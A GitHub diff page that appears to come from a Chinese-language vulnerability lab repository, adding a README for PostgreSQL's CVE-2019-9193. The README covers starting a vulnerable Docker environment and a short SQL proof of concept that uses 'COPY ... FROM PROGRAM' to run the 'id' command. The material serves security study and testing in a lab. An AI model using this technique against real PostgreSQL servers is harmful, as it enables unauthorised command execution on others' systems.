File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree File renamed without changes.
Original file line number Diff line number Diff line change 1+ # PostgreSQL 高权限命令执行漏洞(CVE-2019 –9193)
2+
3+ PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。
4+
5+ 参考链接:
6+
7+ - https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
8+
9+ ## 漏洞环境
10+
11+ 启动存在漏洞的环境:
12+
13+ ```
14+ docker-compose up -d
15+ ```
16+
17+ 环境启动后,将开启Postgres默认的5432端口。
18+
19+ ## 漏洞复现
20+
21+ 首先连接到postgres中,并执行参考链接中的POC:
22+
23+ ``` sql
24+ DROP TABLE IF EXISTS cmd_exec;
25+ CREATE TABLE cmd_exec (cmd_output text );
26+ COPY cmd_exec FROM PROGRAM ' id' ;
27+ SELECT * FROM cmd_exec;
28+ ```
29+
30+ ` FROM PROGRAM ` 语句将执行命令id并将结果保存在cmd_exec表中:
31+
32+ ![ ] ( 1.png )
File renamed without changes.
Original file line number Diff line number Diff line change 1- # PostgreSQL 高权限命令执行漏洞(CVE-2019 – 9193)
1+ # PostgreSQL 高权限命令执行漏洞(CVE-2019 - 9193)
22
33PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。
44
You can’t perform that action at this time.
0 commit comments